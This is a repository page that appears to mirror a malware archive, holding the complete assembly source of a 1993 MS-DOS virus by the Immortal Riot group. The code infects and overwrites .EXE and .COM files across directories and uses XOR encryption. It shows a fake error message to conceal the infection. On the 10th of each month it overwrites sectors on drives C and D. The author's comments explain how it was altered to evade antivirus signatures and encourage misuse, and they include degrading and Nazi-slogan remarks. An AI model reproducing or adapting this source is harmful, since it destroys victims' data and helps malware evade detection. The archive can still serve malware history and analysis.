daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 07:19:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
9baec8a844a373a2bee21900b178dac908165cd7
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.rapbetr.asm
T
vxunderground b60161f008 Add files via upload
2021-01-12 17:55:26 -06:00

340 lines
17 KiB
NASM
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
; VirusName: Raping Betrayals
; Country : Sweden
; Author : The Unforgiven / Immortal Riot
; Date : 15/09/1993
;
;
; This is an mutation of Misery from Immortal Riot.
; I mutated this one, cuz Mcafee scan grabbed it
; within one month after we released it. So, now
; "Misery" is called "Raping Betrayls". Many
; thanks to PCM2 for the original Leprosy virus.
;
; Okey..In this version I just changed the new
; Mcafee "Scan-String", by remarking some calls.
; I also added a day checker, and if the
; virus (or a infected file) is run at the 10:th
; any month, procedure "ellie" will go off..
; Ellie is some sort of heart breaker!..<..hehe..>
;
; It copies itself into other exe/com files on the current
; drive. The file-size will not be changed, cuz it just
; replaces the code in the beginning with itselves. The
; infected files will not work, instead the virus will
; run again. The virus uses dot-dot metod for changing dirs.
;
; There has been many mutations born from Leprosy,
; and here we give you yet another contribution...
;
; McaFee Scan v108 can't find it, neither can S&S Toolkit 6.54
; Havn't tried with TBScan/F-prot, but they will probably
; identify it as "Leprosy".
;
; Regards : The Unforgiven / Immortal Riot
Title Raping Betrayals ; By The Unforgiven / Immortal Riot
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 664 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; Ä-ÄÄÄ--ÄÄ- Encrypt, save, and restore the virus code ÄÄÄ--ÄÄ--Ä-ÄÄ
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
; call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov dx,code_start ; Buffer where code starts in memory
mov cx,virus_size ; Total number of bytes to write
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
; call encrypt_decrypt ; Restore the code as it was
call daycheck ; Call function who check's for day.
ret ; Go back to where you came from
; ÄÄ-ÄÄÄÄ-ÄÄ Encrypt or decrypt the virus code ; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄ-Ä
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start
; encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor al,encrypt_val ; En/dis-engage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
; ÄÄ-ÄÄÄÄÄ---ÄÄÄÄÄ--ÄÄÄ--ÄÄÄ--ÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ----ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
; ÄÄ-ÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄ--ÄÄÄ---ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--Ä-Ä-ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
virus_code:
; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄ--ÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; "All strings are kept here in the file, and automatically encrypted"
; Okey..Thanks to Cybernetic Mutation Technology(tm), for this, but
; the virus is pretty un-use-less if Mcafee scan catch is so, I
; changed a few calls, and you can have phun with this again...
; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ-Ä--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
exe_filespec db "*.EXE",0 ; To infect EXE's
com_filespec db "*.COM",0 ; To infect COM's
newdir db "..",0 ; Move up one directory
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Fake_msg is the message that will be printed on the screen, after
; it has infected files (or when a infected file is run).
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ---ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr,lf,tab,"Betrayal is a sin, if it comes from another..$"
db " The Unforgiven / Immortal Riot " ; HUmm..that's me..
db " Dedicated to Ellie! - Lurve you! "; Love ya Ellie!
db " Sweden 15/09/93 " ; written..
; ÄÄ-ÄÄÄÄÄÄÄ----ÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Okey..these messages just are just "file-size out-fillers" or something,
; nothing important..so I remarked them, and the virus is a bit smaller...
; also check in prodedure "Exit_virus" for more info about m..
;virus_msg2 db cr,lf,tab," Something was placed here before.. $"
;virus_msg3 db cr,lf,tab," But now, it's all gone, black, sad $"
;virus_msg4 db cr,lf,tab," and empty. Empty places i my mind, $"
;virus_msg5 db cr,lf,tab," heart, life, and soul, yes, it's a sin. $"
; ÄÄ-ÄÄÄÄÄÄÄÄ---ÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attribs
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attribs
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If "yes", find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribs
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Move the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; Try the process on this one
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret ; Returning to base...
; ÄÄ-ÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-Ä--ÄÄÄÄÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; ELLIE:
; mov ah,09h ; Read under
; mov dx,offset virus_msg1 ; for more
; int 21h ; information
;
; Okey..If it's 10:th (any month), the virus will do something with
; your hard-drives (..ellie..) which I finds to be real nasty ! If
; you wanna check if the function day-check works, just un-mark
; the tree lines under the first "ellie". and the virus_msg1
; "Betrayal is a sin, if it comes from another" will be displayed.
; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Here is the real "Ellie"..Yeah..that's certainly her!
; ÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
ELLIE: ; Here comes the bitch..
cli ; Tigh her up!
mov ah,2 ; starting with drive C
cwd ; starting at sector 0
mov cx,0100h ; write 256 sectors
int 026h ; to protect and serve..
jmp maria ; Next victim is Maria..
MARIA: ;Yet another..
MOV AL,3 ;Set to fry drive D
MOV CX,700 ;Set to write 700 sectors
MOV DX,00 ;Starting at sector 0
MOV DS,[DI+99] ;Put random crap in DS
MOV BX,[DI+55] ;More crap in BX
CALL ELLIE ;Jump for joy!...
; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
; If you want Ellie to go off on some special month, just look at procedure
; "Infect_file", and the call to daycheck. Change the call to Monthcheck,
; and "delete" the ";" on procedure monthcheck. But remember, that makes,
; the virus much less destructive, and by that time, all scanners has
; probably added a new scan-string on this one. Now it will go off the
; 10:th every month. Feel free to modify this as much you want to.
; MONTHCHECK: ; Procudure to check
; mov ah,2ah ; what month it is..
; int 21h ; Dos to your service..
; cmp dh,06 ; comp dh,06 (July, month 06)
; je daycheck ; if month 06, jump to daycheck,
; JMP something ; if not, just jump to something..
; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
Daycheck: ; check what day it is..
mov ah,2ah ;
int 21h ; Dos to your service..
cmp dl,10 ; If it is the 10:th,
je ellie ; if yes, have a great fuck..
JMP something ; if not..just can tell you how sorry I'm !
Something: ; Some stupid procedure..but remember..
ret ; Arbeit Macht Frei !
exit_virus:
cmp files_found,15 ; Are at least 15 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load address of the first line
int 21h ; Print it..
; mov dx,offset virus_msg2 ; ---
; int 21h ; Okey..mess(ages) 2-5 have been
; mov dx,offset virus_msg3 ; removed from the code..too bad,
; int 21h ; they were Metallica messages...
; mov dx,offset virus_msg4 ; ---
; int 21h ; Anyway, (ab)use this program, B4
; mov dx,offset virus_msg5 ; Mcafee gets a new string for this
; int 21h ; ---
jmp terminate ; Jump to terminate..
print_fake:
mov ah,09h ; Print fake error message
mov dx,offset fake_msg ; Print "fake_msg"
int 21h ; Dos to your service..
terminate: ; Get ready for quit this program
mov ah,4ch ; DOS terminate process function
int 21h ; Exit..
filler db 8 dup (90h) ; Pad out to 666 bytes
main endp
code ends
end main
; Greeting goes out to : Raver, Metal Militia, Scavenver,
; and of-cuz to Miss Perfect...ELLIE!
Reference in New Issue View Git Blame Copy Permalink